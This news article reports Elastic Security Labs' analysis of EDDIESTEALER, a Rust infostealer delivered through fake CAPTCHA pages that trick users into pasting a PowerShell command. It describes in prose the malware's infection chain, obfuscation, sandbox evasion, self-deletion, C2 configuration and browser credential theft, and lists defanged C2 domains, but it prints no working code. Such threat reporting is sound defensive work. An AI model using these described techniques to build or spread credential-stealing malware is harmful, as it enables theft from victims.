SecurityBrief Asia - Technology news for CISOs & cybersecurity decision-makers
Asia
Guides
#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware
Search
Story image
#
Phishing
#
Email Security
#
Cybersecurity

EDDIESTEALER Rust malware mimics CAPTCHA to steal credentials

Thu, 5th Jun 2025
Author image
By Sean Mitchell, Publisher

Elastic Security Labs has identified a new Rust-based infostealer, EDDIESTEALER, distributed through fake CAPTCHA verification pages designed to deceive users and deploy credential-harvesting malware.

According to research by Elastic Security Labs, EDDIESTEALER is disseminated via adversary-controlled web domains using deceptive CAPTCHA interfaces that mimic legitimate verification systems. These fake CAPTCHAs are crafted to look like genuine prompts, including phrases such as "Verify you are a human" or "I'm not a robot", blending into compromised websites or phishing campaigns to increase their credibility with unsuspecting users.

The initial infection vector observed involves compromised websites hosting an obfuscated React-based JavaScript payload, which presents a fake "I'm not a robot" page. When users interact with this interface, a malicious PowerShell command is copied to their clipboard using the document.execCommand("copy") method. Instructions prompt users to open the Windows run dialog, paste the command, and execute it. This process triggers the silent download of a second-stage payload, named gverify.js, from attacker infrastructure.

gverify.js acts as another obfuscated JavaScript file, whose primary role is to fetch and save the main EDDIESTEALER executable from the attacker domain, storing it in the user's Downloads folder with a pseudorandom name. The malware is then executed in a hidden window using cscript, thus avoiding visible signs of activity to the infected user.

EDDIESTEALER is written in Rust, which researchers say contributes to its stealth and difficulty in analysis compared to C-based malware. "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines. A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart, owing to factors such as zero-cost abstractions, Rust's type system, compiler optimisations, and inherent difficulties in analysing memory-safe binaries," stated researchers from Elastic Security Labs.

The malware employs several obfuscation and anti-analysis techniques. Critical strings within EDDIESTEALER are encrypted using a simple XOR cipher, with each decryption requiring a dedicated key derivation function and inline decryption at runtime. Additionally, stripped symbols and the use of tools like rustbinsign for Rust signature generation complicate static analysis. The malware also uses a unique mutex per sample, created through a decrypted UUID string, to ensure only one instance runs at any given time.

EDDIESTEALER's behaviour also includes simple sandbox evasion: it checks for at least 4.0 GB of available system memory and will self-delete if this threshold is not met. Self-deletion is implemented using NTFS Alternate Data Streams renaming to bypass file locks, a technique observed previously in other malware families.

Upon execution, the malware decrypts configuration data and communicates with its command-and-control (C2) server, following a URI pattern that includes a unique identifier tied to build tracking. The configuration, received via HTTP (not HTTPS), is AES CBC-encrypted and Base64-encoded, containing a session ID, a list of exfiltration tasks, communication keys, and a self-delete flag. The data exfiltrated by EDDIESTEALER encompasses credentials, browser data, cryptocurrency wallet information, and details from password managers, messaging applications, and FTP clients. The specific targets and files are defined by the remote C2 server and can be adjusted by operators.

"The decrypted configuration for this sample contains the following in JSON format: Session ID List of tasks (data to target) AES key for client-to-server message encryption Self-delete flag," Elastic Security Labs stated in their technical analysis. The researchers also provided detailed lists of file paths and applications targeted by the infostealer, including major crypto wallet and browser platforms, highlighting the breadth of potential victim impact.

A notable feature of EDDIESTEALER is its capability to read browser credentials, even on modern versions of Chromium browsers. The malware implements browser-specific logic—reimplementing open source solutions such as ChromeKatz in Rust—to extract cookies and credentials post-decryption by spawning off-screen browser processes and leveraging tools such as the Chrome DevTools Protocol via remote debugging ports. "Since the introduction of Application-bound encryption, malware developers have adapted to alternative methods to bypass this protection and gain access to unencrypted sensitive data, such as cookies. ChromeKatz is one of the more well-received open source solutions that we have seen malware implement. EDDIESTEALER is no exception—the malware developers reimplemented it in Rust," explained researchers.

Recent EDDIESTEALER variants incorporate additional capabilities, such as collecting GPU information, running processes, CPU details, and changing the order of C2 communications. Newer samples now send system information to the server before requesting their configuration, and hardcoded AES keys have replaced those previously delivered by the C2 server. Advanced inlining of functions, a feature of LLVM, is also present in newer samples, making code isolation more challenging for analysts.

During analysis, Elastic Security Labs identified at least 15 EDDIESTEALER samples through code similarities and infrastructure connections. Forensics linked malware payloads to several C2 and intermediary domains, including llll[.]fit, shiglimugli[.]xyz, xxxivi[.]com, and others.

As detailed in the behavioural breakdown provided by Elastic Security Labs, EDDIESTEALER leverages established tactics and techniques as documented in the MITRE ATT&CK framework. These include initial access via phishing and content injection, command and scripting interpreters, user execution, exfiltration over C2 channels, credential access, and evasion strategies.

The research also highlights analysis tips and challenges, such as Rust's stack slot reuse and enum-based error handling, which can impede static disassembly and binary examination efforts. The presence of Rust "panic" metadata within binaries assists in segmenting and mapping code to specific malware modules, subject to metadata not having been stripped during compilation.

Elastic Security Labs released YARA rules, as well as behavioural prevention signatures, to aid security professionals in detecting EDDIESTEALER activity. This includes rules for suspicious PowerShell executions, browser data discovery, ingress tool transfers via PowerShell, and the potential self-deletion of running executables.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X
Related stories
Cloud security gaps widen as AI threats outpace defences
Portnox & CrowdStrike team up for real-time access control
Bitdefender unveils GravityZone tool for easier compliance
Arctic Wolf launches AI security platform in Singapore market
AI accelerates ransomware threat as attacks surge globally
Top stories
Healthcare faces surge in cyberattacks & AI-driven threats
Cobalt unveils platform updates to streamline pentesting workflows
Too many cloud security tools harming incident response times - survey
N-able launches free global UEM certification for IT staff
Claroty adds business-centred risk tools to xDome platform